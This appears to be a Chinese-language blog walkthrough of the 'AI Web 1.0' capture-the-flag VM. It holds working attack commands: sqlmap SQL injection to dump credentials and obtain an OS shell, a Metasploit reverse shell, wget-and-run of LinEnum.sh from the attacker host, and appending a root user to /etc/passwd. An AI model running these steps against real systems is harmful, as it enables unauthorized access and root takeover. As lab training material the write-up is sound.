zoukankan      html  css  js  c++  java
  • AI Web 1.0

    kali:192.168.0.103

    目标机:192.168.0.105

    0X01 端口和目录扫描

    打开目标主页没有任何信息

    clipboard

    a) 端口扫描

    只有一个80端口开启

    clipboard

    b) 目录扫描

    clipboard

    0x03 查看敏感目录robots

    clipboard

    访问敏感目录地址

    两个目录都没有权限访问

    尝试继续挖掘

    在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息

    clipboard

    http://192.168.0.105/se3reTdir777/uploads/没有挖到任何目录,此时回过头来看看上一级目录是什么

    clipboard

    是一个查看信息输入框。

    结合现在所得到的信息,能想到的只有输入框是否有sql注入


    0X04 SQL注入

    clipboard

    a) 验证漏洞是否存在

    将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的

    b) sqlmap跑数据库

    抓包生成re.txt文件

    clipboard

    运行sqlmap

    sqlmap -r /root/re.txt --dbs --batch

    clipboard

    最终得到的数据库账号密码

    sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch

    clipboard

    由此我们得到了凭证


    0X05 sqlmap get webshell

    sqlmap -r /root/re.txt --os-shell

    clipboard

    clipboard

    这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息

    clipboard

    网站根路径/home/www/html/web1x443290o2sdf92213

    clipboard

    出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功

    clipboard


    0X06 系统提权

    a) 反弹交互式shell

    使用命令执行的方式获取反弹shell

    use exploit/multi/script/web_delivery

    clipboard

    b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)

    cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp

    执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行

    c) 编辑passwd文件 添加root权限用户

    perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

    切换用户 su test

    密码 password@123

  • 相关阅读:
    codevs1735 方程的解数(meet in the middle)
    cf280C. Game on Tree(期望线性性)
    使用ASP.NET上传多个文件到服务器
    Oracle DB 数据库维护
    poj 3237(树链剖分+线段树)
    undefined reference to 'pthread_create'
    ios开发-调用系统自带手势
    Mysql创建、删除用户、查询所有用户等教程,提升您的MYSQL安全度!
    Number Sequence_hdu_1005(规律)
    SCU 4313 把一棵树切成每段K个点 (n%k)剩下的点不管
  • 原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
Copyright © 2011-2022 走看看